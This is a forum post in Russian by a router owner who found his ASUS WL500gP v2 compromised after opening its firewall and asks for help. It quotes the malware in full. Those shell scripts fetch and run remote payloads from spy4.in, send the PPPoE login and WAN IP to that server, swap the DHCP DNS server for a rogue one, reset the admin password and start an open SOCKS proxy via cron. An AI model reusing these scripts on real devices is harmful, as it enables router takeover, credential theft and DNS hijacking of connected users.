Имею wl500gpv2 уже 3 года. Изучил полностью. Недавно перепрошил на последнюю прошивку от энтузиастов.
были некоторые проблемы с samba (нет доступа с ipad из программы buzz player). поэтому отключил iptables (iptables -P FORWARD ACCEPT
iptables -P INPUT ACCEPT).
так и оставил. сегодня нужно было изменить некоторые скрипты. обратил внимание, что в /tmp/local/sbin много файлов. прибил лишние процессы и начал смотреть...
содержимое post-firewall:
Code:
#!/bin/sh
cd /usr/local/sbin
wget -q http://spy4.in/data/tofire
chmod +x tofire
sh tofire
rm -rf tofire
добавился файл tocron:
Code:
#!/bin/sh
cd /usr/local/sbin && wget -q http://spy4.in/data/todo && chmod +x todo && ./todo && rm -rf todo
исполняемые 3proxy, proxy, udppm, socks и еще пару
содержимое http://spy4.in/data/todo:
Code:
#!/bin/sh
rip=`nvram get wan0_ipaddr`
ilogin=`nvram get wan0_pppoe_username`
sport=`cat /usr/local/etc/sport`
sleep ` tr -cd 1-9 </dev/urandom | head -c 2`s
wget -q -O ttt http://spy4.in/g.php?rname=$ilogin\&rip=$rip\&sport=$sport
rm -rf ttt
содержимое http://spy4.in/data/tofire:
Code:
#!/bin/sh
nvram set dhcp_dns1_x=217.12.219.20
nvram set http_passwd=qweasdOP
mount -obind /tmp/local /opt
cd /tmp/ && wget http://spy4.in/data/3.tgz && tar xvzf 3.tgz
rm -rf /tmp/3.tgz
mkdir /var/spool/cron/crontabs/ -p
mv -f /tmp/local/admin /var/spool/cron/crontabs/
chmod +x /var/spool/cron/crontabs/admin
killall crond
sleep 3
crond
crontab /var/spool/cron/crontabs/admin -u admin
SPORT=` tr -cd 1-5 </dev/urandom | head -c 5`
echo $SPORT > /usr/local/etc/sport
echo "daemon
nserver 8.8.8.8
auth none
socks -p$SPORT" > /usr/local/etc/3proxy.cfg
killall 3proxy
sleep 5
3proxy /usr/local/etc/3proxy.cfg
cd /usr/local/sbin && ./tocron
особо ничего не вытянет (ip внутренний, iptables уже вкрутил, пароль поменял).
Кто нибудь сталкивался с подобным? чем грозит как думаете? где еще чего посмотреть?
upd проворонил что в dhcp изменен dns на левый. в результате происходит попытка заражения подсоединенных устройств (перекидывает на страницы с предложением обновить браузер.)